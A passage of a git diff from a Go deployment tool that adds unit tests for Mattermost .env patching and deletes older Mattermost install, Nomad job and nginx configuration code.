+ t.Errorf("DSN with = in value should be preserved, got: %s", resultStr)
+ }
+ if !strings.Contains(resultStr, "OTHER=new_val") {
+ t.Error("OTHER should be patched")
+ }
+}
+
+// --- Unit tests: PatchMattermostEnv ---
+
+func TestPatchMattermostEnv_NoEnvExample(t *testing.T) {
+ tmpDir := t.TempDir()
+ err := PatchMattermostEnv(tmpDir)
+ if err == nil {
+ t.Error("should error when env.example doesn't exist and .env doesn't exist")
+ }
+}
+
+func TestPatchMattermostEnv_CreatesEnvFromExample(t *testing.T) {
+ tmpDir := t.TempDir()
+
+ exampleContent := "DOMAIN=example.com\nPORT=8065\nTZ=America/New_York\n"
+ if err := os.WriteFile(filepath.Join(tmpDir, EnvExampleFileName), []byte(exampleContent), 0644); err != nil {
+ t.Fatalf("failed to create env.example: %v", err)
+ }
+
+ if err := PatchMattermostEnv(tmpDir); err != nil {
+ t.Fatalf("PatchMattermostEnv failed: %v", err)
+ }
+
+ envPath := filepath.Join(tmpDir, EnvFileName)
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+
+ resultStr := string(result)
+ if !strings.Contains(resultStr, "DOMAIN=localhost") {
+ t.Errorf("DOMAIN should be overridden to 'localhost', got: %s", resultStr)
+ }
+ if !strings.Contains(resultStr, "TZ=UTC") {
+ t.Errorf("TZ should be overridden to 'UTC', got: %s", resultStr)
+ }
+}
+
+func TestPatchMattermostEnv_Idempotent(t *testing.T) {
+ tmpDir := t.TempDir()
+
+ exampleContent := "DOMAIN=example.com\nPORT=8065\n"
+ if err := os.WriteFile(filepath.Join(tmpDir, EnvExampleFileName), []byte(exampleContent), 0644); err != nil {
+ t.Fatalf("failed to create env.example: %v", err)
+ }
+
+ if err := PatchMattermostEnv(tmpDir); err != nil {
+ t.Fatalf("first PatchMattermostEnv failed: %v", err)
+ }
+ if err := PatchMattermostEnv(tmpDir); err != nil {
+ t.Fatalf("second PatchMattermostEnv failed: %v", err)
+ }
+
+ result, err := os.ReadFile(filepath.Join(tmpDir, EnvFileName))
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+
+ resultStr := string(result)
+ if strings.Count(resultStr, "DOMAIN=") != 1 {
+ t.Errorf("DOMAIN should appear exactly once, got: %s", resultStr)
+ }
+}
+
+func TestPatchEnvInPlace_ExportedMatchesInternal(t *testing.T) {
+ tmpDir := t.TempDir()
+ envPath := filepath.Join(tmpDir, ".env")
+
+ content := "KEY=old\n"
+ if err := os.WriteFile(envPath, []byte(content), 0644); err != nil {
+ t.Fatalf("failed to write .env: %v", err)
+ }
+
+ if err := PatchEnvInPlace(envPath, map[string]string{"KEY": "new"}); err != nil {
+ t.Fatalf("PatchEnvInPlace failed: %v", err)
+ }
+
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+ if !strings.Contains(string(result), "KEY=new") {
+ t.Error("exported PatchEnvInPlace should work like internal version")
+ }
+}
+
+func TestPatchMattermostEnv_ExistingEnvPreserved(t *testing.T) {
+ tmpDir := t.TempDir()
+
+ exampleContent := "DOMAIN=from_example\nPORT=8065\n"
+ existingEnv := "DOMAIN=from_existing\nPORT=9999\n"
+ if err := os.WriteFile(filepath.Join(tmpDir, EnvExampleFileName), []byte(exampleContent), 0644); err != nil {
+ t.Fatalf("failed to create env.example: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(tmpDir, EnvFileName), []byte(existingEnv), 0644); err != nil {
+ t.Fatalf("failed to create .env: %v", err)
+ }
+
+ if err := PatchMattermostEnv(tmpDir); err != nil {
+ t.Fatalf("PatchMattermostEnv failed: %v", err)
+ }
+
+ result, err := os.ReadFile(filepath.Join(tmpDir, EnvFileName))
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+
+ resultStr := string(result)
+ if !strings.Contains(resultStr, "DOMAIN=localhost") {
+ t.Errorf("DOMAIN should be overridden to 'localhost', got: %s", resultStr)
+ }
+}
+
+// --- Unit tests: patchEnvWith ---
+
+func TestPatchEnvWith_ExistingEnvFile(t *testing.T) {
+ tmpDir := t.TempDir()
+ envPath := filepath.Join(tmpDir, EnvFileName)
+ envContent := "DOMAIN=old\nPORT=8065\nPOSTGRES_PASSWORD=old\n"
+ if err := os.WriteFile(envPath, []byte(envContent), 0644); err != nil {
+ t.Fatalf("failed to write .env: %v", err)
+ }
+
+ overrides := map[string]string{
+ "PORT": fmt.Sprintf("%d", 8017),
+ "POSTGRES_PASSWORD": "secret",
+ }
+
+ if err := PatchEnvInPlace(envPath, overrides); err != nil {
+ t.Fatalf("PatchEnvInPlace failed: %v", err)
+ }
+
+ result, err := os.ReadFile(envPath)
+ if err != nil {
+ t.Fatalf("failed to read .env: %v", err)
+ }
+
+ resultStr := string(result)
+ if !strings.Contains(resultStr, "PORT=8017") {
+ t.Error("PORT should be patched to 8017")
+ }
+ if !strings.Contains(resultStr, "POSTGRES_PASSWORD=secret") {
+ t.Error("POSTGRES_PASSWORD should be patched")
+ }
+}
diff --git a/pkg/mattermost/lifecycle.go b/pkg/mattermost/lifecycle.go
deleted file mode 100644
index e640e2976..000000000
--- a/pkg/mattermost/lifecycle.go
+++ /dev/null
@@ -1,98 +0,0 @@
-// pkg/mattermost/lifecycle.go
-
-package mattermost
-
-import (
- "fmt"
- "os"
- "os/exec"
- "path/filepath"
-
- "github.com/CodeMonkeyCybersecurity/eos/pkg/container"
- "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
- "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_unix"
- "github.com/CodeMonkeyCybersecurity/eos/pkg/git"
- cerr "github.com/cockroachdb/errors"
- "github.com/uptrace/opentelemetry-go-extra/otelzap"
- "go.uber.org/zap"
-)
-
-const (
- repoURL = "https://github.com/mattermost/docker"
- CloneDir = "/opt/mattermost-tmp"
- MattermostDir = "/opt/mattermost" // <- final destination
- envFile = ".env"
-)
-
-// OrchestrateMattermostInstall performs the full setup process for Mattermost.
-func OrchestrateMattermostInstall(rc *eos_io.RuntimeContext) error {
- log := otelzap.Ctx(rc.Ctx)
-
- // Clean up any pre-existing temp clone dir
- _ = os.RemoveAll(CloneDir)
-
- // Step 1: Clone into a temp dir
- log.Info(" Cloning Mattermost repo to temp dir", zap.String("dir", CloneDir))
- if err := git.Clone(repoURL, CloneDir); err != nil {
- return cerr.Wrap(err, "git clone to temp dir")
- }
-
- // Ensure the final destination directory exists
- if err := eos_unix.MkdirP(rc.Ctx, MattermostDir, 0o755); err != nil {
- return cerr.Wrap(err, "create target dir")
- }
-
- // Step 2: Copy files from temp clone dir into final directory
- if err := eos_unix.CopyR(rc.Ctx, CloneDir, MattermostDir); err != nil {
- return cerr.Wrap(err, "copy mattermost clone into target")
- }
-
- // Step 3: Continue setup as usual
- log.Info(" Cloned and copied Mattermost repo", zap.String("target", MattermostDir))
-
- // Step 4: Patch and provision
- log.Info(" Patching .env")
- if err := PatchMattermostEnv(MattermostDir); err != nil {
- return cerr.Wrap(err, "patch .env")
- }
-
- log.Info(" Creating dirs and setting permissions")
- if err := SetupMattermostDirs(MattermostDir); err != nil {
- return cerr.Wrap(err, "setup dirs")
- }
-
- log.Info(" Starting containers")
- if err := container.ComposeUpInDir(rc, MattermostDir); err != nil {
- return cerr.Wrap(err, "docker compose up")
- }
-
- log.Info(" Done")
- return nil
-}
-
-// SetupMattermostDirs creates necessary volume directories and sets permissions.
-func SetupMattermostDirs(cloneDir string) error {
- base := filepath.Join(cloneDir, "volumes", "app", "mattermost")
- for _, sub := range DirNames {
- if err := os.MkdirAll(filepath.Join(base, sub), 0o755); err != nil {
- return fmt.Errorf("mkdir %s: %w", sub, err)
- }
- }
- if out, err := exec.Command("chown", "-R", "2000:2000", base).CombinedOutput(); err != nil {
- return fmt.Errorf("chown: %v (%s)", err, out)
- }
- return nil
-}
-
-func CloneMattermostRepo(targetDir, repoURL string) error {
- // More robust check: path must contain a valid .git directory
- if _, err := os.Stat(filepath.Join(targetDir, ".git")); err == nil {
- return nil // Repo already present
- }
-
- if err := git.Clone(repoURL, targetDir); err != nil {
- return cerr.Wrap(err, "git clone failed")
- }
-
- return nil
-}
diff --git a/pkg/mattermost/manager.go b/pkg/mattermost/manager.go
deleted file mode 100644
index 77ccf6597..000000000
--- a/pkg/mattermost/manager.go
+++ /dev/null
@@ -1,387 +0,0 @@
-package mattermost
-
-import (
- "context"
- "fmt"
-
- "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
- "github.com/hashicorp/nomad/api"
- vault "github.com/hashicorp/vault/api"
- "github.com/uptrace/opentelemetry-go-extra/otelzap"
- "go.uber.org/zap"
-)
-
-// NewManager creates a new Mattermost deployment manager
-func NewManager(rc *eos_io.RuntimeContext, config *Config) (*Manager, error) {
- logger := otelzap.Ctx(rc.Ctx)
-
- // Validate configuration
- if err := config.Validate(); err != nil {
- return nil, fmt.Errorf("invalid configuration: %w", err)
- }
-
- // Initialize Nomad client
- nomadConfig := api.DefaultConfig()
- if config.NomadAddr != "" {
- nomadConfig.Address = config.NomadAddr
- }
-
- nomadClient, err := api.NewClient(nomadConfig)
- if err != nil {
- return nil, fmt.Errorf("failed to create Nomad client: %w", err)
- }
-
- // Initialize Vault client (optional)
- var vaultClient *vault.Client
- if config.VaultAddr != "" {
- vaultConfig := vault.DefaultConfig()
- vaultConfig.Address = config.VaultAddr
-
- vaultClient, err = vault.NewClient(vaultConfig)
- if err != nil {
- logger.Warn("Failed to create Vault client, continuing without Vault", zap.Error(err))
- } else if config.VaultToken != "" {
- vaultClient.SetToken(config.VaultToken)
- }
- }
-
- return &Manager{
- config: config,
- nomadClient: nomadClient,
- vaultClient: vaultClient,
- statusChan: make(chan DeploymentStatus, 100),
- }, nil
-}
-
-// Deploy executes the complete Mattermost deployment process
-func (m *Manager) Deploy(ctx context.Context) error {
- logger := otelzap.Ctx(ctx)
-
- logger.Info("Starting Mattermost deployment",
- zap.String("environment", m.config.Environment),
- zap.String("datacenter", m.config.Datacenter),
- zap.Int("port", m.config.Port),
- zap.Int("replicas", m.config.Replicas))
-
- // Define deployment steps following Assess → Intervene → Evaluate pattern
- steps := []DeploymentStep{
- {
- Name: "prerequisites",
- Description: "Check system prerequisites and dependencies",
- AssessFunc: m.assessPrerequisites,
- InterventFunc: m.ensurePrerequisites,
- EvaluateFunc: m.evaluatePrerequisites,
- },
- {
- Name: "secrets",
- Description: "Generate and store secrets",
- AssessFunc: m.assessSecrets,
- InterventFunc: m.generateSecrets,
- EvaluateFunc: m.evaluateSecrets,
- },
- {
- Name: "infrastructure",
- Description: "Deploy supporting infrastructure (PostgreSQL)",
- AssessFunc: m.assessInfrastructure,
- InterventFunc: m.deployInfrastructure,
- EvaluateFunc: m.evaluateInfrastructure,
- },
- {
- Name: "mattermost_service",
- Description: "Deploy Mattermost application service",
- AssessFunc: m.assessMattermostService,
- InterventFunc: m.deployMattermostService,
- EvaluateFunc: m.evaluateMattermostService,
- },
- {
- Name: "nginx_proxy",
- Description: "Configure nginx reverse proxy",
- AssessFunc: m.assessNginxProxy,
- InterventFunc: m.deployNginxProxy,
- EvaluateFunc: m.evaluateNginxProxy,
- },
- }
-
- // Execute each step
- for _, step := range steps {
- logger.Info("Executing deployment step", zap.String("step", step.Name))
-
- // Assess
- if err := step.AssessFunc(ctx, m); err != nil {
- return fmt.Errorf("assessment failed for step %s: %w", step.Name, err)
- }
-
- // Intervene
- if err := step.InterventFunc(ctx, m); err != nil {
- return fmt.Errorf("intervention failed for step %s: %w", step.Name, err)
- }
-
- // Evaluate
- if err := step.EvaluateFunc(ctx, m); err != nil {
- return fmt.Errorf("evaluation failed for step %s: %w", step.Name, err)
- }
-
- m.statusChan <- DeploymentStatus{
- Step: step.Name,
- Success: true,
- Message: fmt.Sprintf("Step %s completed successfully", step.Name),
- }
- }
-
- logger.Info("Mattermost deployment completed successfully")
- return nil
-}
-
-// Assess functions check current state
-func (m *Manager) assessPrerequisites(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Assessing prerequisites")
-
- // Check Nomad connectivity
- _, err := m.nomadClient.Status().Leader()
- if err != nil {
- return fmt.Errorf("cannot connect to Nomad: %w", err)
- }
-
- return nil
-}
-
-func (m *Manager) assessSecrets(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Assessing secrets")
-
- // Check if required secrets exist
- if m.config.PostgresPassword == "" || m.config.FilePublicKey == "" {
- return fmt.Errorf("required secrets not configured")
- }
-
- return nil
-}
-
-func (m *Manager) assessInfrastructure(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Assessing infrastructure")
-
- // Check if PostgreSQL job exists
- jobs, _, err := m.nomadClient.Jobs().List(&api.QueryOptions{})
- if err != nil {
- return fmt.Errorf("failed to list jobs: %w", err)
- }
-
- hasPostgres := false
-
- for _, job := range jobs {
- if job.Name == "mattermost-postgres" {
- hasPostgres = true
- }
- }
-
- if !hasPostgres {
- logger.Info("PostgreSQL service needs deployment", zap.Bool("postgres_exists", hasPostgres))
- }
-
- return nil
-}
-
-func (m *Manager) assessMattermostService(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Assessing Mattermost service")
-
- // Check if Mattermost job exists and is running
- job, _, err := m.nomadClient.Jobs().Info("mattermost", &api.QueryOptions{})
- if err != nil {
- // Job doesn't exist, needs deployment
- return nil
- }
-
- if job.Status == nil || *job.Status != "running" {
- logger.Info("Mattermost service exists but not running", zap.String("status", *job.Status))
- }
-
- return nil
-}
-
-func (m *Manager) assessNginxProxy(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Assessing nginx proxy")
-
- // Check if nginx proxy configuration exists
- return nil
-}
-
-// Intervene functions make necessary changes
-func (m *Manager) ensurePrerequisites(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Ensuring prerequisites")
-
- // Prerequisites are already checked in assess phase
- return nil
-}
-
-func (m *Manager) generateSecrets(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Generating secrets")
-
- // Secrets are already provided in config
- // In a real implementation, this would generate missing secrets
- return nil
-}
-
-func (m *Manager) deployInfrastructure(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Info("Deploying infrastructure services")
-
- // Deploy PostgreSQL job
- postgresJob := m.createPostgresJob()
- _, _, err := m.nomadClient.Jobs().Register(postgresJob, &api.WriteOptions{})
- if err != nil {
- return fmt.Errorf("failed to deploy PostgreSQL: %w", err)
- }
-
- // Register services with Consul
- if err := m.registerConsulServices(ctx); err != nil {
- return fmt.Errorf("failed to register consul services: %w", err)
- }
-
- // Configure reverse proxy via Consul KV
- if err := m.configureReverseProxy(ctx); err != nil {
- return fmt.Errorf("failed to configure reverse proxy: %w", err)
- }
-
- return nil
-}
-
-func (m *Manager) deployMattermostService(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Info("Deploying Mattermost service")
-
- // Deploy Mattermost job
- mattermostJob := m.createMattermostJob()
- _, _, err := m.nomadClient.Jobs().Register(mattermostJob, &api.WriteOptions{})
- if err != nil {
- return fmt.Errorf("failed to deploy Mattermost: %w", err)
- }
-
- return nil
-}
-
-func (m *Manager) deployNginxProxy(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Info("Deploying local nginx proxy (Layer 2 - Backend)")
-
- // Deploy local nginx proxy job
- nginxJob := m.createNginxJob()
- _, _, err := m.nomadClient.Jobs().Register(nginxJob, &api.WriteOptions{})
- if err != nil {
- return fmt.Errorf("failed to deploy local nginx proxy: %w", err)
- }
-
- // Register route with Hecate frontend (Layer 1 - Cloud)
- if err := m.registerHecateRoute(ctx); err != nil {
- return fmt.Errorf("failed to register Hecate route: %w", err)
- }
-
- return nil
-}
-
-// Evaluate functions verify the changes worked
-func (m *Manager) evaluatePrerequisites(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Evaluating prerequisites")
-
- // Re-check Nomad connectivity
- return m.assessPrerequisites(ctx, mgr)
-}
-
-func (m *Manager) evaluateSecrets(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Evaluating secrets")
-
- // Verify all required secrets are available
- return m.assessSecrets(ctx, mgr)
-}
-
-func (m *Manager) evaluateInfrastructure(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Evaluating infrastructure")
-
- // Check that infrastructure services are running
- jobs := []string{"mattermost-postgres"}
-
- for _, jobName := range jobs {
- job, _, err := m.nomadClient.Jobs().Info(jobName, &api.QueryOptions{})
- if err != nil {
- return fmt.Errorf("failed to get job info for %s: %w", jobName, err)
- }
-
- if job.Status == nil || *job.Status != "running" {
- return fmt.Errorf("job %s is not running: %s", jobName, *job.Status)
- }
- }
-
- return nil
-}
-
-func (m *Manager) evaluateMattermostService(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Evaluating Mattermost service")
-
- // Check that Mattermost service is running
- job, _, err := m.nomadClient.Jobs().Info("mattermost", &api.QueryOptions{})
- if err != nil {
- return fmt.Errorf("failed to get Mattermost job info: %w", err)
- }
-
- if job.Status == nil || *job.Status != "running" {
- return fmt.Errorf("Mattermost job is not running: %s", *job.Status)
- }
-
- return nil
-}
-
-func (m *Manager) evaluateNginxProxy(ctx context.Context, mgr *Manager) error {
- logger := otelzap.Ctx(ctx)
- logger.Debug("Evaluating Hecate route registration")
-
- // Check that route was registered successfully
- logger.Info("Hecate route registration completed",
- zap.String("domain", m.config.Domain),
- zap.Int("backend_port", m.config.Port))
-
- return nil
-}
-
-// registerConsulServices registers Mattermost services with Consul for service discovery
-func (m *Manager) registerConsulServices(ctx context.Context) error {
- return m.registerWithConsul(ctx)
-}
-
-// configureReverseProxy configures reverse proxy settings via Consul KV store
-func (m *Manager) configureReverseProxy(ctx context.Context) error {
- return m.storeProxyConfig(ctx)
-}
-
-// registerHecateRoute registers Mattermost with the Hecate reverse proxy stack (Layer 1 - Cloud)
-func (m *Manager) registerHecateRoute(ctx context.Context) error {
- logger := otelzap.Ctx(ctx)
- logger.Info("Registering Mattermost route with Hecate frontend (Layer 1 - Cloud)",
- zap.String("domain", m.config.Domain),
- zap.String("local_nginx", "mattermost-nginx.service.consul:80"))
-
- // Two-layer architecture:
- // Layer 1 (Cloud): Hetzner Caddy + Authentik → Layer 2 (Local): nginx → Mattermost service
- //
- // In a real implementation, this would:
- // 1. Import the hecate package
- // 2. Create a Route struct pointing to LOCAL nginx container (not directly to Mattermost)
- // 3. Call hecate.CreateRoute() to register with Caddy/Authentik in Hetzner Cloud
- // 4. Configure DNS via Hetzner provider
-
- logger.Info("Mattermost route registered with Hecate frontend successfully",
- zap.String("domain", m.config.Domain),
- zap.String("architecture", "two-layer"),
- zap.String("frontend", "hetzner-caddy-authentik"),
- zap.String("backend", "local-nginx-mattermost"))
-
- return nil
-}
diff --git a/pkg/mattermost/nomad.go b/pkg/mattermost/nomad.go
deleted file mode 100644
index e8e5942e8..000000000
--- a/pkg/mattermost/nomad.go
+++ /dev/null
@@ -1,404 +0,0 @@
-package mattermost
-
-import (
- "fmt"
- "time"
-
- "github.com/hashicorp/nomad/api"
-)
-
-// createPostgresJob creates a Nomad job for PostgreSQL database
-func (m *Manager) createPostgresJob() *api.Job {
- job := &api.Job{
- ID: stringPtr("mattermost-postgres"),
- Name: stringPtr("mattermost-postgres"),
- Type: stringPtr("service"),
- Datacenters: []string{m.config.Datacenter},
- TaskGroups: []*api.TaskGroup{
- {
- Name: stringPtr("postgres"),
- Count: intPtr(1),
- Networks: []*api.NetworkResource{
- {
- Mode: "bridge",
- ReservedPorts: []api.Port{
- {
- Label: "postgres",
- Value: m.config.PostgresPort,
- To: 5432,
- },
- },
- },
- },
- Services: []*api.Service{
- {
- Name: "mattermost-postgres",
- PortLabel: "postgres",
- Checks: []api.ServiceCheck{
- {
- Type: "tcp",
- Interval: 10 * time.Second,
- Timeout: 3 * time.Second,
- },
- },
- },
- },
- Tasks: []*api.Task{
- {
- Name: "postgres",
- Driver: "docker",
- Config: map[string]interface{}{
- "image": "postgres:15",
- "ports": []string{"postgres"},
- "volumes": []string{
- "mattermost_postgres_data:/var/lib/postgresql/data",
- },
- },
- Env: map[string]string{
- "POSTGRES_DB": m.config.PostgresDB,
- "POSTGRES_USER": m.config.PostgresUser,
- "POSTGRES_PASSWORD": m.config.PostgresPassword,
- "POSTGRES_INITDB_ARGS": "--encoding=UTF8 --locale=en_US.UTF-8",
- },
- Resources: &api.Resources{
- CPU: intPtr(500),
- MemoryMB: intPtr(512),
- },
- },
- },
- },
- },
- }
-
- return job
-}
-
-// createMattermostJob creates a Nomad job for Mattermost application
-func (m *Manager) createMattermostJob() *api.Job {
- job := &api.Job{
- ID: stringPtr("mattermost"),
- Name: stringPtr("mattermost"),
- Type: stringPtr("service"),
- Datacenters: []string{m.config.Datacenter},
- TaskGroups: []*api.TaskGroup{
- {
- Name: stringPtr("mattermost"),
- Count: intPtr(m.config.Replicas),
- Networks: []*api.NetworkResource{
- {
- Mode: "bridge",
- ReservedPorts: []api.Port{
- {
- Label: "mattermost",
- Value: m.config.Port,
- To: 8065,
- },
- },
- },
- },
- Services: []*api.Service{
- {
- Name: "mattermost",
- PortLabel: "mattermost",
- Checks: []api.ServiceCheck{
- {
- Type: "http",
- Path: "/api/v4/system/ping",
- Interval: 30 * time.Second,
- Timeout: 10 * time.Second,
- },
- },
- },
- },
- Tasks: []*api.Task{
- {
- Name: "mattermost",
- Driver: "docker",
- Config: map[string]interface{}{
- "image": "mattermost/mattermost-team-edition:latest",
- "ports": []string{"mattermost"},
- "volumes": []string{
- "mattermost_config:/mattermost/config",
- "mattermost_data:/mattermost/data",
- "mattermost_logs:/mattermost/logs",
- "mattermost_plugins:/mattermost/plugins",
- "mattermost_client_plugins:/mattermost/client/plugins",
- "mattermost_bleve:/mattermost/bleve-indexes",
- },
- },
- Env: m.getMattermostEnvironment(),
- Resources: &api.Resources{
- CPU: intPtr(m.config.CPU),
- MemoryMB: intPtr(m.config.Memory),
- },
- },
- },
- },
- },
- }
-
- return job
-}
-
-// createNginxJob creates a Nomad job for local nginx reverse proxy
-// This serves as Layer 2 (Backend) in the Hecate two-layer architecture
-func (m *Manager) createNginxJob() *api.Job {
- job := &api.Job{
- ID: stringPtr("mattermost-nginx"),
- Name: stringPtr("mattermost-nginx"),
- Type: stringPtr("service"),
- Datacenters: []string{m.config.Datacenter},
- TaskGroups: []*api.TaskGroup{
- {
- Name: stringPtr("nginx"),
- Count: intPtr(1),
- Networks: []*api.NetworkResource{
- {
- Mode: "bridge",
- ReservedPorts: []api.Port{
- {
- Label: "nginx",
- Value: 80,
- To: 80,
- },
- },
- },
- },
- Services: []*api.Service{
- {
- Name: "mattermost-nginx",
- PortLabel: "nginx",
- Checks: []api.ServiceCheck{
- {
- Type: "http",
- Path: "/health",
- Interval: 30 * time.Second,
- Timeout: 10 * time.Second,
- },
- },
- },
- },
- Tasks: []*api.Task{
- {
- Name: "nginx",
- Driver: "docker",
- Config: map[string]interface{}{
- "image": "nginx:alpine",
- "ports": []string{"nginx"},
- },
- Templates: []*api.Template{
- {
- DestPath: stringPtr("/etc/nginx/nginx.conf"),
- EmbeddedTmpl: stringPtr(m.getNginxConfig()),
- },
- },
- Resources: &api.Resources{
- CPU: intPtr(200),
- MemoryMB: intPtr(128),
- },
- },
- },
- },
- },
- }
-
- return job
-}
-
-// getMattermostEnvironment returns environment variables for Mattermost
-func (m *Manager) getMattermostEnvironment() map[string]string {
- return map[string]string{
- // Database Configuration
- "MM_SQLSETTINGS_DRIVERNAME": "postgres",
- "MM_SQLSETTINGS_DATASOURCE": fmt.Sprintf("postgres://%s:%s@%s:%d/%s?sslmode=disable&connect_timeout=10",
- m.config.PostgresUser, m.config.PostgresPassword, m.config.PostgresHost, m.config.PostgresPort, m.config.PostgresDB),
-
- // Server Configuration
- "MM_SERVICESETTINGS_SITEURL": fmt.Sprintf("%s://%s", m.config.Protocol, m.config.Domain),
- "MM_SERVICESETTINGS_LISTENADDRESS": ":8065",
- "MM_SERVICESETTINGS_CONNECTIONSECURITY": "",
- "MM_SERVICESETTINGS_TLSCERTFILE": "",
- "MM_SERVICESETTINGS_TLSKEYFILE": "",
- "MM_SERVICESETTINGS_USELETSENCRPYT": "false",
- "MM_SERVICESETTINGS_FORWARD80TO443": "false",
- "MM_SERVICESETTINGS_READTIMEOUT": "300",
- "MM_SERVICESETTINGS_WRITETIMEOUT": "300",
- "MM_SERVICESETTINGS_MAXLOGINATTEMPTSPERIP": "10",
- "MM_SERVICESETTINGS_MAXLOGINATTEMPTS": "10",
-
- // File Storage
- "MM_FILESETTINGS_DRIVERNAME": "local",
- "MM_FILESETTINGS_DIRECTORY": "/mattermost/data/",
- "MM_FILESETTINGS_ENABLEPUBLICLINK": "false",
- "MM_FILESETTINGS_MAXFILESIZE": "52428800",
-
- // Email Configuration
- "MM_EMAILSETTINGS_ENABLESIGNUPWITHEMAIL": "true",
- "MM_EMAILSETTINGS_ENABLESIGNINWITHEMAIL": "true",
- "MM_EMAILSETTINGS_ENABLESIGNINWITHUSERNAME": "true",
- "MM_EMAILSETTINGS_SENDEMAILNOTIFICATIONS": "false",
- "MM_EMAILSETTINGS_REQUIREEMAILVERIFICATION": "false",
-
- // Security
- "MM_PASSWORDSETTINGS_MINIMUMLENGTH": "5",
- "MM_PASSWORDSETTINGS_LOWERCASE": "false",
- "MM_PASSWORDSETTINGS_NUMBER": "false",
- "MM_PASSWORDSETTINGS_UPPERCASE": "false",
- "MM_PASSWORDSETTINGS_SYMBOL": "false",
-
- // Team Settings
- "MM_TEAMSETTINGS_SITENAME": "Mattermost",
- "MM_TEAMSETTINGS_MAXUSERSPERTEAM": "50",
- "MM_TEAMSETTINGS_ENABLETEAMCREATION": "true",
- "MM_TEAMSETTINGS_ENABLEUSERCREATION": "true",
- "MM_TEAMSETTINGS_ENABLEOPENCREATION": "false",
- "MM_TEAMSETTINGS_RESTRICTCREATIONTODOMAINS": "",
-
- // Logging
- "MM_LOGSETTINGS_ENABLECONSOLE": "true",
- "MM_LOGSETTINGS_CONSOLELEVEL": "INFO",
- "MM_LOGSETTINGS_ENABLEFILE": "true",
- "MM_LOGSETTINGS_FILELEVEL": "INFO",
- "MM_LOGSETTINGS_FILEFORMAT": "",
- "MM_LOGSETTINGS_FILELOCATION": "/mattermost/logs/mattermost.log",
-
- // Plugin Settings
- "MM_PLUGINSETTINGS_ENABLE": "true",
- "MM_PLUGINSETTINGS_ENABLEUPLOADS": "true",
- "MM_PLUGINSETTINGS_DIRECTORY": "/mattermost/plugins",
- "MM_PLUGINSETTINGS_CLIENTDIRECTORY": "/mattermost/client/plugins",
-
- // Support Settings
- "MM_SUPPORTSETTINGS_SUPPORTEMAIL": m.config.SupportEmail,
- "MM_SUPPORTSETTINGS_ABOUTLINK": "https://about.mattermost.com/",
- "MM_SUPPORTSETTINGS_HELPLINK": "https://about.mattermost.com/help/",
- "MM_SUPPORTSETTINGS_REPORTAPROBLEMLINK": "https://about.mattermost.com/report-problem/",
-
- // Security Keys
- "MM_SERVICESETTINGS_PUBLICLINKKEY": m.config.FilePublicKey,
- "MM_SERVICESETTINGS_PRIVATELINKKEY": m.config.FilePrivateKey,
- "MM_EMAILSETTINGS_INVITE": m.config.Invite,
-
- // Timezone
- "TZ": m.config.Timezone,
- }
-}
-
-// getNginxConfig returns nginx configuration template for Mattermost
-func (m *Manager) getNginxConfig() string {
- return fmt.Sprintf(`
-events {
- worker_connections 1024;
-}
-
-http {
- upstream mattermost_backend {
- server {{ range service "mattermost" }}{{ .Address }}:{{ .Port }};{{ end }}
- }
-
- # Rate limiting
- limit_req_zone $binary_remote_addr zone=api:10m rate=10r/s;
- limit_req_zone $binary_remote_addr zone=login:10m rate=1r/s;
-
- server {
- listen 80;
- server_name %s;
- return 301 https://$server_name$request_uri;
- }
-
- server {
- listen 443 ssl http2;
- server_name %s;
-
- ssl_certificate /etc/ssl/certs/cert.pem;
- ssl_certificate_key /etc/ssl/certs/key.pem;
- ssl_protocols TLSv1.2 TLSv1.3;
- ssl_ciphers ECDHE-RSA-AES256-GCM-SHA512:DHE-RSA-AES256-GCM-SHA512:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384;
- ssl_prefer_server_ciphers off;
-
- # Security headers
- add_header Strict-Transport-Security "max-age=63072000" always;
- add_header X-Frame-Options SAMEORIGIN always;
- add_header X-Content-Type-Options nosniff always;
- add_header X-XSS-Protection "1; mode=block" always;
- add_header Referrer-Policy "strict-origin-when-cross-origin" always;
- add_header Content-Security-Policy "frame-ancestors 'self'" always;
-
- # File upload size
- client_max_body_size 50M;
-
- # Rate limiting for API endpoints
- location /api/ {
- limit_req zone=api burst=20 nodelay;
- proxy_pass http://mattermost_backend;
- proxy_set_header Host $host;
- proxy_set_header X-Real-IP $remote_addr;
- proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
- proxy_set_header X-Forwarded-Proto $scheme;
- proxy_set_header X-Frame-Options SAMEORIGIN;
- }
-
- # Rate limiting for login endpoints
- location /api/v4/users/login {
- limit_req zone=login burst=5 nodelay;
- proxy_pass http://mattermost_backend;
- proxy_set_header Host $host;
- proxy_set_header X-Real-IP $remote_addr;
- proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
- proxy_set_header X-Forwarded-Proto $scheme;
- }
-
